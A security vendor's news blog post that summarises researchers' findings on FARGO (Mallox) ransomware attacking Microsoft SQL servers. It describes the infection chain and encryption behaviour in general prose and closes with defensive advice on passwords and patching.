Check the status of CVEs. Learn More.
Keeping your systems up 100% of the time requires live patching. Our solutions will align strongly with your risk, compliance, and operational uptime requirements.
TuxCare is trusted by the most innovative companies across the globe.
Learn about TuxCare's modern approach to reducing cybersecurity risk with Blogs, White Papers, and more.
Continually increasing Cybersecurity, stability, and availability of Linux servers and open source software since 2009.
TuxCare provides live security patching for numerous industries. Learn how TuxCare is minimizing risk for companies around the world.
2x a month. No spam.
October 4, 2022 - TuxCare expert team
Microsoft SQL servers are being targeted with FARGO ransomware according to AhbLab Security Emergency Response Center (ASEC) researchers.
MS-SQL servers are considered database management systems that store data for internet services and apps.
FARGO is regarded as one of the most prominent ransomware tribes, which together with GlobeImposter concentrate on MS-SQL servers, and it has been called in the past as “Mallox,” because it used to append the “.mallox” extension to the encrypted file.
During the infection and execution of FARGO, the researchers determined that the ransomware infection begins with the MS-SQL process on the compromised computer, which downloads a .NET file using cmd.exe and powershell.exe. The payload then fetches additional malware, including the locker, and generates and executes a BAT file, which terminates specific processes and services.
After that, the ransomware payload injects itself into AppLaunch.exe, a legitimate Windows process. It tries to delete the registry key for the open source ransomware “vaccine” named Raccine. The malware executes the recovery deactivation command and terminates database-related processes, to make their contents available for encryption.
The FARGO ransomware strain excludes some software and directories from the encryption. The aim of this measure is to prevent the compromised system from becoming completely unusable. Excluded from the encryption are several Microsoft Windows system directories, the boot files, Tor Browser, Internet Explorer, user customizations and settings, the debug log file or the thumbnail database.
Once the encryption process is complete, the locked files are renamed with the “.Fargo3” extension, and the malware generates the ransom note (“RECOVERY FILES.txt”).
As a security measure, it is now important for MS SQL server administrators to ensure that they use strong and unique passwords to protect their systems, it is important that they keep the servers up to date by installing the latest fixes for security vulnerabilities.
The sources for this piece include an article in BleepingComputer.
Learn About Live Patching with TuxCare
According to CyberArk researchers, GPT-based models like ChatGPT can be...
Malicious hackers have started exploiting a critical vulnerability CVE-2022-44877 in...
Deep Instinct researchers reported that RATs like StrRAT and Ratty...
According to CircleCI’s CTO, Rob Zuber, CircleCI is working with...
A remote attacker could exploit multiple vulnerabilities in four Cisco...
In a notable IcedID malware attack, the assailant impacted the...